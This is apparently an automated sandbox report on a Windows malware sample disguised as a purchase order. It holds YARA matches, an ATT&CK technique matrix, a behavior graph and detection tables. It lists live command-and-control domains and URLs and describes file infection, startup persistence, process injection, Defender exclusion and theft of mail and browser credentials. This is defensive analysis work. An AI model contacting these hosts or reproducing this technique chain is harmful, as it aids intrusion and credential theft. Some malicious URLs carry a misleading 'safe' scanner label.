                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2a50ee8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2752d86.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3c95570.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000D.00000002.2136041654.0000000002711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2137004258.0000000002A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2139311354.0000000003C95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2137350892.0000000002B90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d24dc0.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d54e10.14.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.0.server01.exe.e40000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d3cdf0.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d24dc0.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3252, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: server01.exe PID: 4324, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00458C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00458C4F
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0045923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0045923B
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information111
                        Scripting
                        2
                        Valid Accounts
                        4
                        Native API
                        111
                        Scripting
                        1
                        Exploitation for Privilege Escalation
                        111
                        Disable or Modify Tools
                        1
                        OS Credential Dumping
                        2
                        System Time Discovery
                        1
                        Taint Shared Content
                        1
                        Archive Collected Data
                        2
                        Ingress Tool Transfer
                        Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts1
                        Scheduled Task/Job
                        2
                        LSASS Driver
                        1
                        Abuse Elevation Control Mechanism
                        1
                        Deobfuscate/Decode Files or Information
                        21
                        Input Capture
                        1
                        Account Discovery
                        Remote Desktop Protocol1
                        Data from Local System
                        11
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts2
                        Service Execution
                        1
                        DLL Side-Loading
                        2
                        LSASS Driver
                        1
                        Abuse Elevation Control Mechanism
                        Security Account Manager3
                        File and Directory Discovery
                        SMB/Windows Admin Shares1
                        Email Collection
                        3
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCron2
                        Valid Accounts
                        1
                        DLL Side-Loading
                        4
                        Obfuscated Files or Information
                        NTDS137
                        System Information Discovery
                        Distributed Component Object Model21
                        Input Capture
                        14
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchd1
                        Windows Service
                        2
                        Valid Accounts
                        1
                        Direct Volume Access
                        LSA Secrets1
                        Query Registry
                        SSH3
                        Clipboard Data
                        Fallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                        Scheduled Task/Job
                        21
                        Access Token Manipulation
                        1
                        Software Packing
                        Cached Domain Credentials341
                        Security Software Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd Timers2
                        Registry Run Keys / Startup Folder
                        1
                        Windows Service
                        1
                        Timestomp
                        DCSync31
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job212
                        Process Injection
                        1
                        DLL Side-Loading
                        Proc Filesystem3
                        Process Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAt1
                        Scheduled Task/Job
                        222
                        Masquerading
                        /etc/passwd and /etc/shadow11
                        Application Window Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCron2
                        Registry Run Keys / Startup Folder
                        2
                        Valid Accounts
                        Network Sniffing1
                        System Owner/User Discovery
                        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd31
                        Virtualization/Sandbox Evasion
                        Input Capture1
                        System Network Configuration Discovery
                        Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task21
                        Access Token Manipulation
                        KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                        Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers212
                        Process Injection
                        GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561085 Sample: PO #09465610_GQ 003745_SO-2... Startdate: 22/11/2024 Architecture: WINDOWS Score: 100 86 reallyfreegeoip.org 2->86 88 zlenh.biz 2->88 90 19 other IPs or domains 2->90 104 Suricata IDS alerts for network traffic 2->104 106 Found malware configuration 2->106 108 Malicious sample detected (through community Yara rule) 2->108 112 15 other signatures 2->112 12 alg.exe 1 2->12         started        17 PO #09465610_GQ 003745_SO-242000846.exe 5 2->17         started        19 wscript.exe 2->19         started        21 7 other processes 2->21 signatures3 110 Tries to detect the country of the analysis system (by using the IP) 86->110 process4 dnsIp5 92 lpuegx.biz 82.112.184.197, 49727, 49782, 49833 FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU Russian Federation 12->92 94 xlfhhhm.biz 47.129.31.212, 49935, 80 ESAMARA-ASRU Canada 12->94 98 5 other IPs or domains 12->98 68 C:\Program Files\...\updater.exe, PE32+ 12->68 dropped 70 C:\Program Files\...\private_browsing.exe, PE32+ 12->70 dropped 72 C:\Program Files\...\plugin-container.exe, PE32+ 12->72 dropped 80 120 other malicious files 12->80 dropped 136 Creates files in the system32 config directory 12->136 138 Writes data at the end of the disk (often used by bootkits to hide malicious code) 12->138 140 Drops executable to a common third party application directory 12->140 96 cvgrf.biz 54.244.188.177, 49704, 49705, 49706 AMAZON-02US United States 17->96 74 C:\Windows\System32\alg.exe, PE32+ 17->74 dropped 76 DiagnosticsHub.Sta...llector.Service.exe, PE32+ 17->76 dropped 78 C:\Windows\System32\AppVClient.exe, PE32+ 17->78 dropped 82 5 other malicious files 17->82 dropped 142 Binary is likely a compiled AutoIt script file 17->142 144 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 17->144 146 Infects executable files (exe, dll, sys, html) 17->146 23 Grinnellia.exe 2 17->23         started        148 Windows Scripting host queries suspicious COM object (likely to drop second stage) 19->148 27 Grinnellia.exe 19->27         started        150 Contains functionality to behave differently if execute on a Russian/Kazak computer 21->150 152 Found direct / indirect Syscall (likely to bypass EDR) 21->152 file6 signatures7 process8 file9 64 C:\Users\user\AppData\...behaviorgraphrinnellia.vbs, data 23->64 dropped 114 Binary is likely a compiled AutoIt script file 23->114 116 Drops VBS files to the startup folder 23->116 118 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 23->118 120 Switches to a custom stack to bypass stack traces 23->120 29 Grinnellia.exe 1 23->29         started        33 RegSvcs.exe 23->33         started        122 Writes to foreign memory regions 27->122 124 Maps a DLL or memory area into another process 27->124 35 RegSvcs.exe 27->35         started        signatures10 process11 file12 84 C:\Users\user\AppData\Local\...\aut8C49.tmp, StarOffice 29->84 dropped 154 Binary is likely a compiled AutoIt script file 29->154 156 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 29->156 158 Writes to foreign memory regions 29->158 160 Maps a DLL or memory area into another process 29->160 37 RegSvcs.exe 6 29->37         started        signatures13 process14 file15 60 C:\Users\user\AppData\Local\...\server01.exe, PE32 37->60 dropped 62 C:\Users\user\AppData\...\Trading_AIBot.exe, PE32 37->62 dropped 40 Trading_AIBot.exe 37->40         started        44 server01.exe 37->44         started        process16 dnsIp17 66 C:\Users\user\AppData\Roaming\...\apihost.exe, PE32 40->66 dropped 126 Uses schtasks.exe or at.exe to add and modify task schedules 40->126 128 Drops large PE files 40->128 130 Adds a directory exclusion to Windows Defender 40->130 47 powershell.exe 40->47         started        50 schtasks.exe 40->50         started        52 apihost.exe 40->52         started        100 checkip.dyndns.com 132.226.8.169, 49710, 80 UTMEMUS United States 44->100 102 reallyfreegeoip.org 104.21.67.152, 443, 49712 CLOUDFLARENETUS United States 44->102 132 Tries to steal Mail credentials (via file / registry access) 44->132 134 Tries to harvest and steal browser information (history, passwords, etc) 44->134 file18 signatures19 process20 signatures21 162 Loading BitLocker PowerShell Module 47->162 54 conhost.exe 47->54         started        56 WmiPrvSE.exe 47->56         started        58 conhost.exe 50->58         started        process22

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        PO #09465610_GQ 003745_SO-242000846.exe100%AviraW32/Infector.Gen
                        PO #09465610_GQ 003745_SO-242000846.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://54.244.188.177/ygrk0%Avira URL Cloudsafe
                        http://54.244.188.177/7&30%Avira URL Cloudsafe
                        http://54.244.188.177:80/fowvjqhq0%Avira URL Cloudsafe
                        http://18.141.10.107/F0%Avira URL Cloudsafe
                        http://18.141.10.107/M0%Avira URL Cloudsafe
                        http://18.141.10.107/0%Avira URL Cloudsafe
                        http://18.141.10.107/uqppkasccjtxkC0%Avira URL Cloudsafe
                        http://18.141.10.107/pmxflidirkcbpvmtV0%Avira URL Cloudsafe
                        http://54.244.188.177/tp0%Avira URL Cloudsafe
                        http://54.244.188.177/z0%Avira URL Cloudsafe
                        http://54.244.188.177/?uA0%Avira URL Cloudsafe
                        http://18.141.10.107/uqppkasccjtxk0%Avira URL Cloudsafe
                        http://54.244.188.177/ucqpyylY0%Avira URL Cloudsafe
                        http://54.244.188.177/tp$V0%Avira URL Cloudsafe
                        http://18.141.10.107/pmxflidirkcbpvm.Sy0%Avira URL Cloudsafe
                        http://54.244.188.177/V100%Avira URL Cloudphishing
                        http://54.244.188.177/%&0%Avira URL Cloudsafe
                        http://54.244.188.177/ucqpyyl0%Avira URL Cloudsafe
                        http://54.244.188.177:80/ucqpyyl0%Avira URL Cloudsafe
                        http://54.244.188.177/f100%Avira URL Cloudphishing
                        http://54.244.188.177/ygrkx0%Avira URL Cloudsafe
                        http://54.244.188.177/tpz0%Avira URL Cloudsafe
                        http://18.141.10.107/pmxflidirkcbpvm0%Avira URL Cloudsafe
                        http://54.244.188.177/fowvjqhq0%Avira URL Cloudsafe
                        http://54.244.188.177:80/tpU0%Avira URL Cloudsafe
                        http://54.244.188.177:80/ygrk0%Avira URL Cloudsafe
                        http://18.141.10.107/d30%Avira URL Cloudsafe
                        http://18.141.10.107:80/uqppkasccjtxk0%Avira URL Cloudsafe
                        http://18.141.10.107:80/pmxflidirkcbpvm0%Avira URL Cloudsafe
                        http://54.244.188.177/&uX0%Avira URL Cloudsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        przvgke.biz
                        172.234.222.143
                        truefalse
                          high
                          ssbzmoy.biz
                          18.141.10.107
                          truefalse
                            high
                            knjghuig.biz
                            18.141.10.107
                            truefalse
                              high
                              vjaxhpbji.biz
                              82.112.184.197
                              truefalse
                                high
                                pywolwnvd.biz
                                54.244.188.177
                                truefalse
                                  high
                                  reallyfreegeoip.org
                                  104.21.67.152
                                  truefalse
                                    high
                                    ifsaia.biz
                                    13.251.16.150
                                    truefalse
                                      high
                                      deoci.biz
                                      18.208.156.248
                                      truefalse
                                        high
                                        checkip.dyndns.com
                                        132.226.8.169
                                        truefalse
                                          high
                                          tbjrpv.biz
                                          34.246.200.160
                                          truefalse
                                            high
                                            cvgrf.biz
                                            54.244.188.177
                                            truefalse
                                              high
                                              lpuegx.biz
                                              82.112.184.197
                                              truefalse
                                                high
                                                saytjshyf.biz
                                                44.221.84.105
                                                truefalse
                                                  high
                                                  xlfhhhm.biz
                                                  47.129.31.212
                                                  truefalse
                                                    high
                                                    fwiwk.biz
                                                    172.234.222.143
                                                    truefalse
                                                      high
                                                      vcddkls.biz
                                                      18.141.10.107
                                                      truefalse
                                                        high
                                                        npukfztj.biz
                                                        44.221.84.105
                                                        truefalse
                                                          high
                                                          zlenh.biz
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            checkip.dyndns.org
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              uhxqin.biz
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                anpmnmxo.biz
                                                                unknown
                                                                unknownfalse
                                                                  high
                                                                  NameMaliciousAntivirus DetectionReputation
                                                                  http://ifsaia.biz/jlhpxxcqfalse
                                                                    high
                                                                    http://pywolwnvd.biz/ygrkfalse
                                                                      high
                                                                      http://saytjshyf.biz/xyvnmtdiyfgocmfalse
                                                                        high
                                                                        http://lpuegx.biz/svftqsgvqnihfalse
                                                                          high
                                                                          http://ssbzmoy.biz/uqppkasccjtxkfalse
                                                                            high
                                                                            http://tbjrpv.biz/hofalse
                                                                              high
                                                                              http://checkip.dyndns.org/false
                                                                                high
                                                                                http://fwiwk.biz/mhwavsfalse
                                                                                  high
                                                                                  http://vjaxhpbji.biz/dpxeblwuppuirbnxfalse
                                                                                    high
                                                                                    http://knjghuig.biz/ywaoqfakpesqvfalse
                                                                                      high
                                                                                      http://lpuegx.biz/ecjuuqdshncewfalse
                                                                                        high
                                                                                        http://ssbzmoy.biz/pmxflidirkcbpvmfalse
                                                                                          high
                                                                                          http://fwiwk.biz/dydgtoryupjgtlfalse
                                                                                            high
                                                                                            http://cvgrf.biz/ncgaeohboisfalse
                                                                                              high
                                                                                              http://przvgke.biz/hvtqtjugbboqpmfalse
                                                                                                high
                                                                                                http://pywolwnvd.biz/tpfalse
                                                                                                  high
                                                                                                  http://npukfztj.biz/xmmfsweyvhuefalse
                                                                                                    high
                                                                                                    https://reallyfreegeoip.org/xml/8.46.123.75false
                                                                                                      high
                                                                                                      http://xlfhhhm.biz/wjxiioeyplqiisfalse
                                                                                                        high
                                                                                                        http://vcddkls.biz/lyroetjkhxfalse
                                                                                                          high
                                                                                                          http://pywolwnvd.biz/fowvjqhqfalse
                                                                                                            high
                                                                                                            http://przvgke.biz/tohnhxnrpjsefalse
                                                                                                              high
                                                                                                              http://pywolwnvd.biz/ksmybghbmbqfalse
                                                                                                                high
                                                                                                                http://vjaxhpbji.biz/fgjkxxtfalse
                                                                                                                  high
                                                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                  http://54.244.188.177:80/fowvjqhqGrinnellia.exe, 00000008.00000002.2099138098.0000000000B72000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://18.141.10.107/Falg.exe, 00000003.00000003.2124461247.00000000005DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://crl.microsoftpowershell.exe, 00000010.00000002.2246819288.0000000007583000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2262728885.0000000008452000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://crashpad.chromium.org/bug/newsetup.exe1.3.drfalse
                                                                                                                      high
                                                                                                                      http://reallyfreegeoip.orgdserver01.exe, 0000000F.00000002.3330930022.00000000031AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881alg.exe, 00000003.00000003.2874567280.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://18.141.10.107/MGrinnellia.exe, 00000016.00000002.2250241974.0000000000B5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://54.244.188.177/7&3PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://contoso.com/Licensepowershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://18.141.10.107/pmxflidirkcbpvmtValg.exe, 00000003.00000003.2124461247.00000000005D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://crashpad.chromium.org/https://crashpad.chromium.org/bug/newsetup.exe1.3.drfalse
                                                                                                                              high
                                                                                                                              http://18.141.10.107/Grinnellia.exe, 00000016.00000002.2249712826.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000002.2250241974.0000000000B5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://18.141.10.107/uqppkasccjtxkCGrinnellia.exe, 00000016.00000002.2251340435.0000000000C0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://54.244.188.177/ygrkGrinnellia.exe, 0000000B.00000002.2126725116.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000002.2128861465.0000000000C4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://54.244.188.177/tpalg.exe, 00000003.00000003.2124461247.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://54.244.188.177/zalg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://54.244.188.177/?uAGrinnellia.exe, 0000000B.00000002.2126725116.0000000000AEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://checkip.dyndns.org/qRegSvcs.exe, 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                high
                                                                                                                                https://contoso.com/powershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://nuget.org/nuget.exepowershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://reallyfreegeoip.orgserver01.exe, 0000000F.00000002.3330930022.00000000031AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://18.141.10.107/uqppkasccjtxkGrinnellia.exe, 00000016.00000002.2251340435.0000000000C0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://aka.ms/pscore6lBjqpowershell.exe, 00000010.00000002.2197639351.0000000004B41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.autoitscript.com/autoit3/8alg.exe, 00000003.00000003.3026882137.0000000001440000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.3011446827.0000000001440000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://checkip.dyndns.comserver01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://checkip.dyndns.org/dserver01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameserver01.exe, 0000000F.00000002.3330930022.0000000003111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2197639351.0000000004B41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://54.244.188.177/ucqpyylYPO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073325882.0000000000CD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
